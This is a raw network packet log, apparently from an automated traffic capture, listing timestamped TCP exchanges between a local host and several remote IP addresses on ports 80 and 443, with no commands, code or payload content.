Nov 9, 2024 02:47:34.129070044 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.129084110 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.129101992 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.129111052 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.129115105 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.129139900 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.129172087 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.129172087 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.129188061 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.129199982 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.129211903 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.129224062 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.129234076 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.129256010 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.129267931 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.129278898 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.129287004 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.129301071 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.129312038 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.129314899 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.129328012 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.129333019 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.129342079 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.129343033 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.129367113 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.129390001 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.129412889 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.129451036 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.129530907 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.129540920 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.129585028 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.130014896 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.130108118 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.130202055 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.130219936 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.130229950 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.130249977 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.130264997 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.130266905 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.130281925 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.130294085 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.130296946 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.130306959 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.130315065 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.130321026 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.130335093 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.130337954 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.130347013 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.130364895 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.130371094 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.130379915 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.130390882 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.130393028 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.130409956 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.130409956 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.130424976 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.130434990 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.130438089 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.130450010 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.130461931 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.130466938 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.130490065 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.130507946 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.130527973 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.130539894 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.130549908 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.130561113 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.130573034 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.130583048 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.130589962 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.130595922 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.130609989 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.130616903 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.130626917 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.130630016 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.130635023 CET	443	53015	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.130641937 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.130649090 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.130656004 CET	443	53015	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.130688906 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.130719900 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.130742073 CET	443	53015	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.130768061 CET	53015	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:34.130783081 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.130794048 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.130795956 CET	53015	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:34.130805969 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.130830050 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.130841970 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.130871058 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.130882978 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.130892992 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.130903959 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.130914927 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.130937099 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.130939007 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.130948067 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.130959034 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.130964994 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.130971909 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.130985022 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.130999088 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.131026983 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.131069899 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131083012 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131093025 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131103992 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131110907 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.131114960 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131139994 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131150961 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131153107 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.131164074 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131177902 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131186962 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131189108 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.131200075 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131208897 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.131217957 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131230116 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131237030 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.131243944 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131257057 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131266117 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131274939 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.131275892 CET	53041	443	192.168.2.7	3.167.152.61
Nov 9, 2024 02:47:34.131278992 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131288052 CET	443	53041	3.167.152.61	192.168.2.7
Nov 9, 2024 02:47:34.131292105 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131295919 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.131328106 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131337881 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.131340027 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131354094 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131366014 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131371021 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.131378889 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131390095 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.131400108 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131417990 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131422997 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.131431103 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131441116 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131448030 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.131452084 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131470919 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131481886 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131485939 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.131494999 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131510019 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131525040 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131527901 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.131536961 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.131544113 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131557941 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131562948 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.131572008 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131583929 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131588936 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.131594896 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131607056 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131618023 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131619930 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.131630898 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131643057 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131652117 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.131671906 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.131690025 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.131808043 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131825924 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131836891 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131849051 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131860971 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131867886 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.131879091 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131891012 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131892920 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.131901979 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131916046 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131917953 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.131927013 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131937981 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131951094 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131953955 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.131963968 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.131997108 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.132006884 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.132014036 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.132020950 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.132035017 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.132055044 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.132065058 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.132076979 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.132088900 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.132101059 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.132103920 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.132114887 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.132131100 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.132158995 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.132271051 CET	53015	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:34.132281065 CET	443	53015	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.132292032 CET	53015	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:34.132297039 CET	443	53015	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.132620096 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.132633924 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.132646084 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.132673025 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.132689953 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.132710934 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.132724047 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.132734060 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.132750034 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.132761002 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.132769108 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.132781029 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.132781029 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.132793903 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.132805109 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.132833958 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.132844925 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.132853031 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.132863998 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.132873058 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.132883072 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.132894039 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.132900000 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.132906914 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.132931948 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.132947922 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.132951021 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.132963896 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.132977009 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.132989883 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.132989883 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.132992983 CET	443	53017	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.133007050 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.133008957 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.133024931 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.133030891 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.133032084 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.133037090 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.133047104 CET	443	53017	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.133049011 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.133059978 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.133065939 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.133071899 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.133083105 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.133090019 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.133095980 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.133107901 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.133109093 CET	53017	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:34.133125067 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.133135080 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.133147955 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.133157015 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.133177996 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.133192062 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.133217096 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.133271933 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.133326054 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.133357048 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.133446932 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.138423920 CET	53022	443	192.168.2.7	20.125.209.212
Nov 9, 2024 02:47:34.138441086 CET	443	53022	20.125.209.212	192.168.2.7
Nov 9, 2024 02:47:34.138484001 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.159328938 CET	443	53024	20.99.185.48	192.168.2.7
Nov 9, 2024 02:47:34.159847975 CET	53017	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:34.159858942 CET	443	53017	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.159868956 CET	53017	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:34.159873962 CET	443	53017	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.165956974 CET	53042	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:34.165968895 CET	443	53042	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.166039944 CET	53042	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:34.166197062 CET	53043	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:34.166223049 CET	443	53043	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.166271925 CET	53043	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:34.166424036 CET	53042	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:34.166434050 CET	443	53042	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.166532040 CET	53043	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:34.166546106 CET	443	53043	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.173810959 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.173825026 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.173837900 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.173930883 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.173979044 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.174022913 CET	443	53022	20.125.209.212	192.168.2.7
Nov 9, 2024 02:47:34.174078941 CET	53022	443	192.168.2.7	20.125.209.212
Nov 9, 2024 02:47:34.174945116 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.175040007 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.175091028 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.175101042 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.175438881 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.175468922 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.175554037 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.175563097 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.175681114 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.175760031 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.175818920 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.175847054 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.175875902 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.175903082 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.175935030 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.175935030 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.175944090 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.176004887 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.176429033 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.176484108 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.176512003 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.176539898 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.176548958 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.176568031 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.176629066 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.177182913 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.177216053 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.177241087 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.177258015 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.177264929 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.177309036 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.177743912 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.177774906 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.177803040 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.177805901 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.177814960 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.177858114 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.177875042 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.177881956 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.177898884 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.178548098 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.178587914 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.178615093 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.178617001 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.178626060 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.178675890 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.196619987 CET	53022	443	192.168.2.7	20.125.209.212
Nov 9, 2024 02:47:34.196651936 CET	443	53022	20.125.209.212	192.168.2.7
Nov 9, 2024 02:47:34.214441061 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.214453936 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.214513063 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.244945049 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.244987011 CET	53024	443	192.168.2.7	20.99.185.48
